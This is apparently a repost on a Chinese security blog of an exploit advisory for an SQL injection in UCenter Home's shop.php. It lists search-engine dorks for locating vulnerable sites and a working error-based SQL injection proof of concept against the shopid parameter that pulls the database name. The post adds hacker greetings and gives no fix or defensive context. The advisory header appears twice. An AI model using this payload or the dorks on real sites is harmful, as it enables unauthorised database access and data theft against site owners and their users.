- A+
所属分类:Seay信息安全博客
显示不全请点击全屏阅读
*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: [email protected]
*/ Cyber-Warrior.org/CWKnocKout
Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=
Vuln file : Shop.php
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: [email protected]
*/ Cyber-Warrior.org/CWKnocKout
Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=
Vuln file : Shop.php
===================================================================
利用POC
shop.php?ac=view&shopid=4 and (select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
来自:Ay暗影 博客
Tags:
如果您喜欢我的博客,欢迎点击图片定订阅到邮箱 也可以点击链接【订阅到鲜果】
如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡